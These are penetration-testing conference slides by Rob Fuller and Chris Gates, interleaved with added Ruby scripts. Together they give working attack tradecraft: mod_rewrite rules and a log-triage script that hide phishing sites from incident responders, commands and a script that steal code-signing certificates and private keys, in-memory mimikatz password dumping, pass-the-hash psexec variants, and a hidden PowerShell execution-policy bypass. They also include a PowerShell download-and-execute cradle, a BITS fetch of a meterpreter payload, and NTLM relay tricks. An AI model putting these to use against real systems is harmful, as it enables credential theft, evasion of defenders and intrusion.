Whoami
• Rob Fuller (mubix)
  – Twitter -> mubix
  – Blog -> http://www.room362.com
  – NoVA Hackers

• Previous Talks
  –   Dirty Little Secrets
  –   Networking for Penetration Testers
  –   Metasploit Framework/Pro Training for Rapid7
  –   Deep Magic 101
  –   Couch to Career in 80 hours
Whoami
• Chris Gates (CG)
   –   Twitter carnal0wnage
   –   Blog carnal0wnage.attackresearch.com
   –   Job Partner/Principal Security Consultant at Lares
   –   NoVAHackers
• Previous Talks
   –   ColdFusion for Pentesters
   –   From LOW to PWNED
   –   Dirty Little Secrets
   –   Attacking Oracle (via web)
   –   wXf Web eXploitation Framework
   –   Open Source Information Gathering
   –   Attacking Oracle (via TNS)
   –   Client-Side Attacks
Infoz
• No philosophical stuff this time
  – Just digging in and showing neat shit we’ve been
    doing since last year
  – Last year’s stuff still applies, although we were told we
    were “preaching to the choir”… who still doesn’t
    do it… maybe on Sundays…
  – Anyway…
Agenda
•   Putting in the hours on LinkedIn for SE
•   Giving IR teams a run for their money
•   Stealing certs
•   Mimikatz with Metasploit
•   New Incognito && Netview release
•   Ditto
•   10 ways to PSEXEC
•   Why doesn’t SYSTEM have proxy settings!?!
•   Windows is my backdoor (bitsadmin, powershell, wmi )
•   WebDAV server via metasploit
•   Turning your External Pentest into an Internal one
•   Overview of current DNS Payload options (if time)
The setup…

We like to use LinkedIn for OSINT but
      how can we do it better?
Becoming a LiON
• Why?
   • The API is based on YOUR connections
   • 2nd and 3rd level connections count, but are given different access
• Creating a fake account
• Connecting with recruiters ++
• Connecting with “Open Networkers”
LinkedIn API
       • URL:
         https://developer.linkedin.com
       • Allows you to query
         information
           – Company info
           – Groups
           – Name about your 1st &
             2nd order connections
Big Ass LinkedIn Network
• Meet “John”
• John has been busy being awesome on LinkedIn
  for the last few months
2nd level connections to Obamz
LinkedIn API
• Limited by YOUR connections and network
  reach
• API gives you NO info about 3rd order
  connections
• Usually you’ll see more info via the web on 3rd
  order people
• The total number of search results possible for
  any search will vary depending on the
  user's account level.
LinkedIn API
• An example (Palantir)
  CG                 vs.      John
LinkedIn API
• An example (Pfizer)
  CG                  vs.      John
LinkedIn API
• An example (Bank of America)
  CG                vs.        John
More LinkedIn
• Turning an email list into validated LinkedIn
  Contacts/emails
• Import them!
More LinkedIn
• Get some emails
More LinkedIn
• Import them!




• Need them in a specific format though.
  – Ruby to the rescue
More LinkedIn
• Get some ruby
More LinkedIn
• Get some contacts
More LinkedIn
• Import and do your thing
The setup…

IR teams F**k up all my hard work
     preparing phishing attacks
Phishing and F**king with IR Teams
• Thanks to people like SANS, organizations have
  a standardized, repeatable process 
  – What’s not to like?
  – Submit to the sandbox
  – Submit to the malware lookup site
  – I feel safe!
• But, sure does suck when you spend all that
  time setting up a phish only to have it ruined
  by this well tuned, standardized process…
Phishing and F**king with IR Teams
• What you *could* do…
   – Build a phish that EVERYONE will report
   – Capture the IR process via log/scan/analyst activity
• This gives you intel on:
   – Which services are contracted out for analysis
      • And their IPs
   – Are humans in the mix
      • And their IPs
   – Level of sophistication
Phishing and F**king with IR Teams
• Once you know who’s coming to do analysis,
  we can send them to an alternate site and
  keep the users going to the phish site.
• How?
Phishing and F**king with IR Teams
• Apache and mod_rewrite is an option
• Comments go on their own lines (Apache doesn’t allow a trailing comment on a
  directive) and the dots in the IP conditions are escaped, otherwise they match
  any character.

RewriteEngine On
# empty User-Agent (most sandboxes and scripted fetches)
RewriteCond %{HTTP_USER_AGENT} ^$ [OR]
# junk in the User-Agent
RewriteCond %{HTTP_USER_AGENT} ^.*(<|>|'|%0A|%0D|%27|%3C|%3E|%00).* [NC,OR]
# tools, not browsers
RewriteCond %{HTTP_USER_AGENT} ^.*(HTTrack|clshttp|archiver|loader|email|nikto|miner|python|wget).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(winhttp|libwww-perl|curl|libcurl|harvest|scan|grab|extract).* [NC,OR]
# outside IR
RewriteCond %{REMOTE_ADDR} ^188\.168\.16\.164$ [OR]
# googlebot
RewriteCond %{REMOTE_ADDR} ^66\.249\.73\.136$ [OR]
RewriteCond %{REMOTE_ADDR} ^88\.88\.
RewriteRule ^(/.*) http://www.totallysafesite.com/$1 [R,L]
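Added example, not from the slides: a Ruby triage script for the "capture the IR process via log activity" step. It reads Apache combined-format access log lines (a constructed sample is embedded; the two IPs named in the slide's RewriteConds reappear in it, the rest are documentation-range addresses), flags every client that behaved like a sandbox, crawler or analyst rather than a user, and prints the RewriteCond lines to paste in front of the RewriteRule above. The landing and payload paths and the victim egress range are assumptions.

```ruby
require 'time'
require 'ipaddr'

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "ua"
LOG_LINE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>\S+) (?<path>\S+)[^"]*" (?<status>\d+) \S+ "(?<ref>[^"]*)" "(?<ua>[^"]*)"\z/

# UA fragments a victim's browser never sends: the slide's RewriteCond list
# plus bot/spider for crawlers.
SCANNER_UA = /HTTrack|clshttp|archiver|loader|email|nikto|miner|python|wget|winhttp|libwww-perl|curl|libcurl|harvest|scan|grab|extract|bot|spider/i

LANDING = '/invoice.html'  # page the phish mail links to (assumed name)
PAYLOAD = '/invoice.exe'   # what that page hands out (assumed name)

# Egress ranges real victims come from (constructed for this example).
VICTIM_RANGES = %w[10.1.5.0/24].map { |c| IPAddr.new(c) }

# Constructed access log: the victim on lines 1-2, then what a reported phish
# draws: a sandbox with no UA, a hosted-analysis box running curl, a crawler,
# and an analyst pulling the payload from an out-of-range IP with a browser.
SAMPLE_LOG = <<~'ACCESS'
  10.1.5.23 - - [21/Sep/2012:09:01:10 -0400] "GET /invoice.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1"
  10.1.5.23 - - [21/Sep/2012:09:01:12 -0400] "GET /invoice.exe HTTP/1.1" 200 73728 "http://phish.example/invoice.html" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1"
  188.168.16.164 - - [21/Sep/2012:09:14:30 -0400] "GET /invoice.exe HTTP/1.1" 200 73728 "-" "-"
  203.0.113.77 - - [21/Sep/2012:09:15:02 -0400] "GET /invoice.exe HTTP/1.1" 200 73728 "-" "curl/7.26.0"
  66.249.73.136 - - [21/Sep/2012:09:20:41 -0400] "GET /invoice.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
  198.51.100.9 - - [21/Sep/2012:09:31:55 -0400] "GET /invoice.exe HTTP/1.1" 200 73728 "-" "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20100101 Firefox/15.0.1"
ACCESS

Hit = Struct.new(:ip, :time, :path, :ua)

def parse_log(text)
  text.each_line.map do |line|
    m = LOG_LINE.match(line.strip) or next
    Hit.new(m[:ip], Time.strptime(m[:ts], '%d/%b/%Y:%H:%M:%S %z'), m[:path], m[:ua])
  end.compact
end

# { ip => [flags] }; an empty flag list means the client looked like a user.
def triage(hits)
  hits.group_by(&:ip).each_with_object({}) do |(ip, client), out|
    flags = []
    uas   = client.map(&:ua).uniq
    paths = client.map(&:path)
    flags << :empty_ua   if uas.any? { |u| u.empty? || u == '-' }
    flags << :scanner_ua if uas.any? { |u| u.match?(SCANNER_UA) }
    # Pulled the URL out of the mail and fetched the payload directly without
    # ever rendering the landing page: sandbox or analyst, not a user.
    flags << :payload_without_landing if paths.include?(PAYLOAD) && !paths.include?(LANDING)
    addr = (IPAddr.new(ip) rescue nil)
    flags << :outside_victim_range unless addr && VICTIM_RANGES.any? { |r| r.include?(addr) }
    out[ip] = flags
  end
end

def responder_ips(hits)
  triage(hits).select { |_, flags| flags.any? }.keys.sort
end

# RewriteCond lines for the diversion, dots escaped, [OR] on every line but
# the last so the RewriteRule that follows fires for any of them.
def rewrite_conds(ips)
  ips.each_with_index.map do |ip, i|
    "RewriteCond %{REMOTE_ADDR} ^#{Regexp.escape(ip)}$#{i == ips.length - 1 ? '' : ' [OR]'}"
  end
end

if $PROGRAM_NAME == __FILE__
  hits = parse_log(ARGV.empty? ? SAMPLE_LOG : File.read(ARGV[0]))
  triage(hits).each { |ip, flags| puts format('%-16s %s', ip, flags.empty? ? 'victim?' : flags.join(',')) }
  puts rewrite_conds(responder_ips(hits))
end
```

Run it against the real log a few hours after the first report lands; the IPs that show up with flags are the sandbox, the contracted analysis service and the analyst's workstation, which is exactly the intel the previous slide lists.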
The setup…

I want to find and steal code signing
      certificates from victims
Stealing Certificates
• Why?
• Have you tried to get/buy one? It’s a pain in
  the ass.
  – I see why people just steal them
• Impact
  – Sign code as the company
  – Now your code may be *more* trusted by the
    victim…or at least less suspicious
  – Can you steal their wildcard SSL cert?
Stealing Certificates
• If you export one, it has to have a password 
• However, if YOU export it, YOU can set the password.
• You can do this all on the command line
  – Use Mozilla’s certutil
     • http://www.mozilla.org/projects/security/pki/nss/tools/certutil.html
  – Use Mimikatz 
Stealing Certificates
•   Mozilla certutil
•   Compile your own, or download precompiled bins

certutil.exe -L -d C:\Users\CG\AppData\Roaming\Mozilla\Firefox\Profiles\6smdhwru.default-1339854577637
VeriSign Class 3 Extended Validation SSL CA                  ,,
DigiCert High Assurance CA-3                                 ,,
VeriSign Class 3 International Server CA - G3                ,,
COMODO Extended Validation Secure Server CA 2                ,,
Verified Publisher LLC's COMODO CA Limited ID                u,u,u   <------- code signer
Akamai Subordinate CA 3                                      ,,
VeriSign, Inc.                                               ,,
--snip--
Stealing Certificates
•   Mozilla certutil
•   -L  List all the certificates, or display information about a named certificate, in a
    certificate database.
•   The trust column is three comma-separated fields: SSL, e-mail, object signing.
•   “u”  Certificate can be used for authentication or signing (the private key is in this
    database, so it’s the user’s own cert; “u” in the third field is a code signer)
•   http://www.mozilla.org/projects/security/pki/nss/tools/certutil.html
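Added example, not from the slides: a Ruby parser for the certutil -L listing above that decodes the three trust fields and picks out the entries with a private key in the DB, i.e. the ones worth a pk12util run. The sample listing is the slide's, re-typed with the header lines certutil prints; the pk12util output name and password are whatever you pass in. Point it at every profile directory you find on the box rather than eyeballing each listing.

```ruby
# Trust-attribute column order in `certutil -L` output is SSL, e-mail,
# object signing; the letters are the ones from the NSS certutil docs.
FLAG_MEANING = {
  'u' => 'user cert, private key in this DB',
  'C' => 'trusted CA (client certs)',
  'T' => 'trusted CA (server certs)',
  'c' => 'valid CA',
  'p' => 'valid peer',
  'P' => 'trusted peer',
  'w' => 'warn'
}.freeze
COLUMNS = %i[ssl email objsign].freeze

# The listing from the slide (re-typed), including certutil's two header lines.
SAMPLE_LISTING = <<~'OUT'
  Certificate Nickname                                         Trust Attributes
                                                               SSL,S/MIME,JAR/XPI

  VeriSign Class 3 Extended Validation SSL CA                  ,,
  DigiCert High Assurance CA-3                                 ,,
  VeriSign Class 3 International Server CA - G3                ,,
  COMODO Extended Validation Secure Server CA 2                ,,
  Verified Publisher LLC's COMODO CA Limited ID                u,u,u
  Akamai Subordinate CA 3                                      ,,
  VeriSign, Inc.                                               ,,
OUT

# nickname, two or more spaces, then the three flag groups.
ENTRY = /\A(?<nick>\S.*?)\s{2,}(?<trust>[A-Za-z]*,[A-Za-z]*,[A-Za-z]*)(?=\s|\z)/

# Returns [{nickname:, ssl: [...], email: [...], objsign: [...]}, ...]
def parse_certutil(text)
  text.each_line.map do |line|
    m = ENTRY.match(line.rstrip) or next
    flags = m[:trust].split(',', -1).map(&:chars)
    { nickname: m[:nick] }.merge(COLUMNS.zip(flags).to_h)
  end.compact
end

def describe(flags)
  flags.empty? ? '-' : flags.map { |f| FLAG_MEANING.fetch(f, "?#{f}") }.join('; ')
end

# 'u' in any column means the private key is in this DB, so it's ours to
# export; 'u' in the objsign column is what signs code.
def private_key_certs(entries)
  entries.select { |e| COLUMNS.any? { |c| e[c].include?('u') } }
end

def code_signers(entries)
  entries.select { |e| e[:objsign].include?('u') }
end

# The pk12util line for the slide's next step.
def pk12util_cmd(nickname, dbdir, out: 'export.p12', password: 'changeme')
  %(pk12util.exe -n "#{nickname}" -d "#{dbdir}" -o #{out} -W #{password})
end

if $PROGRAM_NAME == __FILE__
  # Usage: ruby certs.rb listing.txt "C:\path\to\profile"
  entries = parse_certutil(ARGV.empty? ? SAMPLE_LISTING : File.read(ARGV[0]))
  entries.each { |e| puts format('%-50s objsign: %s', e[:nickname], describe(e[:objsign])) }
  code_signers(entries).each { |e| puts pk12util_cmd(e[:nickname], ARGV[1] || '<profile dir>') }
end
```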
Stealing Certificates
• Mozilla pk12util.exe
• To extract the cert and key, with a password YOU choose:

C:\Users\CG\Downloads\nss-3.10\nss-3.10\bin>pk12util.exe -n "Verified Publisher LLC's COMODO CA Limited ID" -d C:\Users\CG\AppData\Roaming\Mozilla\Firefox\Profiles\6smdhwru.default-1339854577637 -o test2.p12 -W mypassword1

• If the profile has a master password set, pk12util prompts for it (or takes it with -K).
•   http://www.mozilla.org/projects/security/pki/nss/tools/pk12util.html
Stealing Certificates
Via Mimikatz (list certs)
execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::listCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE My" exit'

Process 3472 created.
Channel 12 created.
mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 6 2012 04:02:46) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz(commandline) # crypto::listCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE My
Location : 'CERT_SYSTEM_STORE_LOCAL_MACHINE'\My
    - sqlapps01
         Key container : SELFSSL
         Provider      : Microsoft RSA SChannel Cryptographic Provider
         Type          : AT_KEYEXCHANGE
         Exportable    : YES
         Key size      : 1024

mimikatz(commandline) # exit
Stealing Certificates
Via Mimikatz (export certs)
execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" exit'
Process 6112 created.
Channel 23 created.
mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 6 2012 04:02:46) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz(commandline) # crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE
Location : 'CERT_SYSTEM_STORE_LOCAL_MACHINE'\My
    - sqlapps01
         Key container : SELFSSL
         Provider      : Microsoft RSA SChannel Cryptographic Provider
         Type          : AT_KEYEXCHANGE
         Exportable    : YES
         Key size      : 1024
         Private key exported to 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_sqlapps01.pfx' : OK
         Public cert exported to 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_sqlapps01.der' : OK

mimikatz(commandline) # exit

• “Exportable : YES” is what makes this a one-liner. If it says NO, the stock export fails;
  that is what mimikatz’s crypto::patchcapi / crypto::patchcng are for.
The setup…

   Mimikatz is awesome and I want to
execute it without putting bins on the box
Mimikatz gives me clear text
       passwords?
So does WCE!
Mimikatz
•   Mimikatz detected by AV
•   Sekurlsa.dll detected by AV
•   WCE detected by AV
•   WCE IN MEMORY! (kinda)


     Stop submitting $#!+ to Virus Total!
Mimikatz
• New version (6 Sep 12) supports in-memory
•   execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"sekurlsa::logonPasswords full" exit'
• -m runs the local mimikatz.exe from memory inside the dummy process given by -d (calc.exe here),
  so mimikatz never touches the target’s disk; -H hides the window, -i/-c interact with and
  channelize the output.
The setup…

Incognito is awesome and I want to
  show/leverage the new features
New Incognito (find_token)
C:\>find_token.exe
usage:

find_token.exe <server_name_or_ip> | -f <server_list_file> [username] [password]
New Incognito (find_token)
C:\>find_token.exe dc1
[*] Scanning for logged on users...

Server Name                Username
------------------------------------------------------
dc1           PROJECTMENTOR\jdoe
dc1           PROJECTMENTOR\jdoe
Release of NETVIEW
C:\Documents and Settings\user\Desktop>netview

Netviewer Help
--------------------------------------------------------------------

-d domain              : Specifies a domain to pull a list of hosts from
                         uses current domain if none specified

-f filename.txt        : Specifies a file to pull a list of hosts from
-o filename.txt        : Out to file instead of STDOUT
Release of NETVIEW
C:\Documents and Settings\user\Desktop>netview -d
[*] -d used without domain specifed - using current domain
[+] Number of hosts: 3

[+] Host: DC1
Enumerating AD Info
[+] DC1 - Comment -
[+] DC1 - OS Version - 6.1
[+] DC1 - Domain Controller
Enumerating IP Info
[+] DC1 - IPv4 Address - 172.16.10.10
Enumerating Share Info
[+] DC1 - Share - ADMIN$      Remote Admin
[+] DC1 - Share - C$          Default share
[+] DC1 - Share - IPC$        Remote IPC
[+] DC1 - Share - NETLOGON    Logon server share
[+] DC1 - Share - SYSVOL      Logon server share
Enumerating Session Info
[+] DC1 - Session - USER from 172.16.10.206 - Active: 0 - Idle: 0
Enumerating Logged-on Users
[+] DC1 - Logged-on - PROJECTMENTOR\jdoe
[+] DC1 - Logged-on - PROJECTMENTOR\jdoe

[+] Host: WIN7X64
Enumerating AD Info
[+] WIN7X64 - Comment -
[+] WIN7X64 - OS Version - 6.1
Enumerating IP Info
[+] WIN7X64 - IPv4 Address - 172.16.10.216
Enumerating Share Info
[+] WIN7X64 - Share - ADMIN$      Remote Admin
[+] WIN7X64 - Share - C$          Default share
[+] WIN7X64 - Share - IPC$        Remote IPC
Enumerating Session Info
[+] WIN7X64 - Session - USER from 172.16.10.206 - Active: 0 - Idle: 0
Enumerating Logged-on Users
Release of NETVIEW
AND IT’S ALREADY ON GITHUB:
The setup…

Dropping binaries is a necessity sometimes,
persistence for instance, but unless you
name your bin SVCHOST.exe you don’t want
it looking like this:
Meet ‘DITTO’
He does something really well…
And it’s not just the icon…
Yes, it’s already on Github too
The setup…

Who doesn’t want more ways to
        psexec??!!!
10 ways to PSEXEC
Sysinternals PsExec
POSITIVES
• Never going to be on any AV list
• Executes binary as the user specified, not as SYSTEM, so no proxy concerns
NEGATIVES
• Need a password
• Leaves PSEXESVC running
• Have to touch disk if not present already
Metasploit PSEXEC
POSITIVES
• Supports the use of hashes
NEGATIVES
• Some AVs flag the service binary due to the injection techniques used within
• rundll32.exe is running
Metasploit PSEXEC-MOF
POSITIVES
• Drop a file and Windows automatically runs it. (MAGIC!)
NEGATIVES
• XP and below (only because Metasploit doesn’t automatically compile MOFs)
• ADMIN$ required (unless you make code edits)
Metasploit PSEXEC-As-User
POSITIVES
• Executes as the current user
• No need for passwords or hashes
• Also a great way to bypass UAC.. but more on that later
NEGATIVES
• Some AVs flag the service binary due to the injection techniques used within
• rundll32.exe is running
WMI
POSITIVES
• Never going to be on any AV list
• Executes binary as the user specified, not as SYSTEM, so no proxy concerns
NEGATIVES
• Need a password
Powershell
POSITIVES
• Never going to be on any AV list
• Executes binary as the user specified, not as SYSTEM, so no proxy concerns
NEGATIVES
• Need a password
RemCom
POSITIVES
• Open source psexec
• You can add Pass-The-Hash (open source an’ all)
NEGATIVES
• Binary, so again, can’t go over Metasploit sessions directly
  (portfwd fu can still be used on a single IP)
• Runs as SYSTEM
Winexe
POSITIVES
• Open source psexec
• Supports Pass-The-Hash
NEGATIVES
• Binary, so again, can’t go over Metasploit sessions directly
  (portfwd fu can still be used on a single IP)
• Runs as SYSTEM
smbexec
POSITIVES
• Open source psexec
• Supports Pass-The-Hash
NEGATIVES
• Binary (but designed with shoveling over Metasploit in mind)

    http://sourceforge.net/projects/smbexec/
Pass the hash for 15 years stuff here
•   Firefox
•   smbclient
•   smbmount
•   Rpcclient

• http://passing-the-hash.blogspot.com/
Zfasel’s stuff here
• If it ever gets released, it works ;-)

                LOVE YOU FASEL!!

          Go see his talk, it works now… maybe…
Python && impacket
• http://code.google.com/p/impacket/
• PTH support for SMB/MSSQL
WinRM (‘new’ hotness)
POSITIVES
• Never going to be on any AV list
• Executes binary as the user specified, not as SYSTEM, so no proxy concerns
NEGATIVES
• Need a password
Do you look for 5985 internally on your pen tests?
                 we would suggest it ;-)
(5985 is WinRM over HTTP; 5986 is the HTTPS listener.)
Victim: winrm quickconfig -q

Attacker:
winrm quickconfig -q
winrm set winrm/config/client @{AllowUnencrypted="true";TrustedHosts="192.168.1.101"}

      Yes.. that’s right, THE ATTACKER says which hosts to trust…
      (TrustedHosts is the client’s own list of non-Kerberos hosts it will hand
      credentials to; the victim still has to accept the account you use.)

 Sooooo much fun to be had!
 Oh, and did I mention it’s completely interactive? (You can answer password prompts)
Metasploit PSEXEC-WinRM
POSITIVES
• Never going to be on any AV list
• Executes binary as the user specified, not as SYSTEM, so no proxy concerns
NEGATIVES
• Need a password

   DISCLAIMER: CURRENTLY VAPORWARE!!
                  but…
Build your own pyBear
• PySMB supports auth using hashes
• Thanks Rel1k for the heads up on the library – but
  I’m not a good enough coder to get it working
• Compile your own psexec with hash support
• ;-)
• Impacket (again)
Build your own Bear.rb
• Metasploit’s Rex library
  – already has the hash passing goodness
  – HDM committed a stand-alone version of PSEXEC
    on September 5th 2012
The setup…

UAC sucks… bypassing only takes 2
            things…
The setup…

If you’re an admin and UAC is stopping
                 you…
Find a network with more than one
          Windows box…
The setup…

Why doesn’t SYSTEM have proxy settings!?!
• If the OS is older than Vista (XP/2003 don’t ship bitsadmin)
   – SMB/UPLOAD_FILE BITSADMIN 2.0 (32bit)
• WINDOWS/EXEC (or any of the other psexec methods we just talked about)
   – BITSADMIN /UTIL /SETIEPROXY LOCALSYSTEM AUTOSCRIPT http://wpad/wpad.dat (or any PAC URL)
   – BITSADMIN /UTIL /SETIEPROXY LOCALSYSTEM MANUAL_PROXY 192.168.5.100:3128 ";"
   – After you’re done, use NO_PROXY in place of AUTOSCRIPT or MANUAL_PROXY
• Then MSF-PSEXEC to your heart’s content; SYSTEM will now use the proxy you’ve set.
NETSH & ProxyCFG
• Sets the WinHTTP proxy
  – Not Windows’ proxy settings, only is used if the
    program uses WinHTTP
• XP
  – proxycfg –p 192.168.92.100:3128
  – or
  – proxycfg –u (pulls it from IE)
• Vista+
  – netsh winhttp set proxy 192.168.92.100:3128
  – or
  – netsh winhttp import proxy ie
REGISTRY Poking
• HKLM\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
• ProxySettingsPerUser [DWORD]
• Set to 0: proxy settings are system-wide (read from HKLM, so SYSTEM gets them too)
• Set to 1: proxy settings are per user (the default)
The setup…

 Neat binaries that do backdoor/RAT
behavior that are already there for us.
Windows is my backdoor
BITS
  “BITS is a file transfer service that provides a
  scriptable interface through Windows PowerShell.
  BITS transfers files asynchronously in
  the foreground or in the background. And, it
  automatically resumes file transfers after network
  disconnections and after a computer is restarted.”

  http://technet.microsoft.com/en-us/library/dd819415.aspx
Windows is my backdoor
BITS
  There are three types of BITS transfer jobs:

     - A download job downloads files to the client
computer.
     - An upload job uploads a file to the server.
     - An upload-reply job uploads a file to the server and
receives a reply file from the server application.
Windows is my backdoor
BITS (How-To)
• Set the server side up (HTTP, not standard setup)
   – Google
   – Downloads work against any web server that honours Range requests; uploads need a
     server that speaks the BITS upload protocol (IIS with the BITS Server Extensions)
• Uses PowerShell to upload/download

import BITS
PS C:\Users\cg> Import-Module BitsTransfer

Download files over BITS
PS C:\Users\cg> Start-BitsTransfer http://192.168.26.128/upload/meterp443.exe C:\Users\cg\Desktop\meterpdownload443.exe
Windows is my backdoor
BITS (How-To)
Upload files over BITS
PS C:\Users\cg> Start-BitsTransfer -Source C:\Users\cg\Desktop\file2upload.txt -Destination http://192.168.26.128/upload/myfile.txt -TransferType Upload
Windows is my backdoor
BITS over Wireshark
Windows is my backdoor
• Powershell
• OMG Powershell!
Windows is my backdoor
• Powershell
Windows is my backdoor
• PowerShell
  – Does A LOT!
  – Check out Exploit Monday and PowerSploit
  – Carlos Perez has had lots of PowerShell blog posts
  – I haven't found a meterpreter feature that can't be done with PowerShell
Windows is my backdoor
• Powershell cool examples
  – PowerShell hashdump (in SET)
  – PowerShell exec method in MSSQL_Payload
  – PowerSploit (syringe dll inject/shellcode exec ala PowerShell)
Windows is my backdoor
• Powershell cool examples
• Port Scanner:
PS C:\> 1..1024 | % { echo ((new-object Net.Sockets.TcpClient).Connect("10.1.1.14",$_)) "$_ is open" } 2>$null

25 is open

  – Connect() is synchronous, so every filtered port costs a full TCP timeout; fine on a
    LAN, slow against a firewalled host.

•   From Tim Medin https://blogs.sans.org/pen-testing/files/2012/04/PowerShellForPT-export.pdf
Windows is my backdoor
• Powershell cool examples
• Port Sweeper
PS C:\> 1..255 | % { echo ((new-object Net.Sockets.TcpClient).Connect("10.1.1.$_",445)) "10.1.1.$_" } 2>$null

10.1.1.5

•   From Tim Medin https://blogs.sans.org/pen-testing/files/2012/04/PowerShellForPT-export.pdf
Windows is my backdoor
• Powershell cool examples
• Bypass execution policy
  – Dave Kennedy talked about this at defcon 18
  – Requires PowerShell v2.0 or above

  – powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File "C:\do_neat_ps_shit.ps1"
Windows is my backdoor
• CreateCMD stuff from Dave Kennedy
•   In SET

• Pshexec by Carlos Perez
•   https://github.com/darkoperator/Meterpreter-Scripts/blob/master/scripts/meterpreter/pshexec.rb

• B64 encodes the command (as UTF-16LE, which is what -EncodedCommand expects) so you
  can pass it via meterp or in another script
• powershell -noexit -EncodedCommand [b64enc BLOB]
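Added example, not pshexec.rb or SET code: the encoding step in Ruby, with the UTF-16LE detail spelled out and a length check, because a process command line is capped and a base64'd UTF-16 script inflates about 2.7x. The download-cradle URL is an assumption built from the listener IP in the next slide.

```ruby
require 'base64'

# -EncodedCommand takes base64 of the script encoded as UTF-16LE. Encoding the
# UTF-8 bytes instead is the classic mistake: PowerShell decodes garbage and
# reports that the "term" is not recognized.
def encode_command(script)
  Base64.strict_encode64(script.encode('UTF-16LE'))
end

def decode_command(blob)
  Base64.strict_decode64(blob).force_encoding('UTF-16LE').encode('UTF-8')
end

# Same switches as the slide's run_ps.bat, plus -NoExit when you want the
# host to stay up (a long-running stager) rather than exit after the script.
def powershell_cmdline(script, keep_open: false)
  opts = %w[-NoProfile -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass]
  opts << '-NoExit' if keep_open
  "powershell.exe #{opts.join(' ')} -EncodedCommand #{encode_command(script)}"
end

# CreateProcess caps a command line at 32767 characters. Over that, drop the
# .ps1 and use -File (the bat file route) or stage it with a one-line cradle.
MAX_CMDLINE = 32_767
def fits_cmdline?(script)
  powershell_cmdline(script, keep_open: true).length <= MAX_CMDLINE
end

# The kind of one-liner you'd pass; host and path are assumptions.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://1.2.3.205/ipinfo2.ps1')"

if $PROGRAM_NAME == __FILE__
  # Usage: ruby enc.rb "<powershell>"   (prints the full command line to hand to execute -f cmd.exe -a '/c ...')
  puts powershell_cmdline(ARGV.empty? ? CRADLE : ARGV.join(' '))
end
```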
Windows is my backdoor
• Metasploit to generate PowerShell
• Uses old powersploit technique
Windows is my backdoor
• How to run PowerShell from Meterpreter
   – Use a bat file
C:\>type run_ps.bat
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File C:\ipinfo2.ps1


Example:
meterpreter > execute -H -f cmd.exe -a '/c C:\run_ps.bat'
Process 28536 created.
meterpreter >
[*] 4.5.6.21:3863 Request received for /vLNL...
[*] 4.5.6.21:3863 Staging connection for target /vLNL received...
--snip--
[*] Patched Communication Timeout at offset 653608...
[*] Meterpreter session 9 opened (1.2.3.205:443 -> 4.5.6.21:3863) at 2012-09-09 16:29:30 -0400
The setup…

A webdav server to download files from.
       Why? Because we can.
MSF WebDAV server
MSF WebDAV server
• net use \\ip\documents /User:Guest

• copy \\ip\documents\myexe.exe myexe.exe

• Available on github:
• https://github.com/carnal0wnage/Metasploit-Code/blob/master/modules/exploits/webdav_file_server.rb
MSF WebDAV server
msf exploit(webdav_file_server) > [*] 192.168.26.1:17870 OPTIONS /documents/myexe.exe

[*] 192.168.26.1:17870   PROPFIND /documents/myexe.exe
[*] 192.168.26.1:17870   PROPFIND => 207 File (/documents/myexe.exe)
[*] 192.168.26.1:17870   PROPFIND /documents/myexe.exe
[*] 192.168.26.1:17870   PROPFIND => 207 File (/documents/myexe.exe)
[*] 192.168.26.1:17870   PROPFIND   /documents
[*] 192.168.26.1:17870   PROPFIND   => 301 (/documents)
[*] 192.168.26.1:17870   PROPFIND   /documents/
[*] 192.168.26.1:17870   PROPFIND   => 207 Directory (/documents/)
[*] 192.168.26.1:17870   PROPFIND => 207 Top-Level Directory
[*] 192.168.26.1:17870   GET => Delivering Local EXE Payload [ /tmp/myexe.exe ]
The Setup…

LAN based attacks are instant wins on
 internal pentests, but difficult if not
impossible to do on externals… or are
                they…
While we are on the subject…
Does anyone know what happens when you try to access a share that doesn’t
exist on a Windows box, from another Windows box??

                    Client: I want to access SHARE3
                    Server: I don’t have SHARE3

                    Is that it?
nope
     (if the WebClient service is started – Vista+ has it set to manual start)

                    Client: I want to access SHARE3
                    Server: I don’t have SHARE3 on SMB
                    Client: I want to access SHARE3 over WebDAV

If you are following along at home: Windows is always (unless disabled) listening on
port 445 (SMB), so an attacker can’t override it, but a box rarely has anything listening on port 80.
On-target NBNS Spoofing




              FakeNetbiosNS FTW!
Meet the Microsoft Windows Firewall “PORTPROXY” feature
Basically it’s port-forwarding (netsh interface portproxy) but can do so for:
    IPv4 -> IPv4
    IPv6 -> IPv4
    IPv6 -> IPv6
    IPv4 -> IPv6

 In XP, if you set up a PORTPROXY, it doesn’t show up in “NETSTAT” or TCPview ;-)
Now convince/cause someone to connect to a fake share on VICTIM1…
weeeeeeeeeeeeee
[*] 50.50.50.50 http_ntlm - Request '/share3/test.png'...
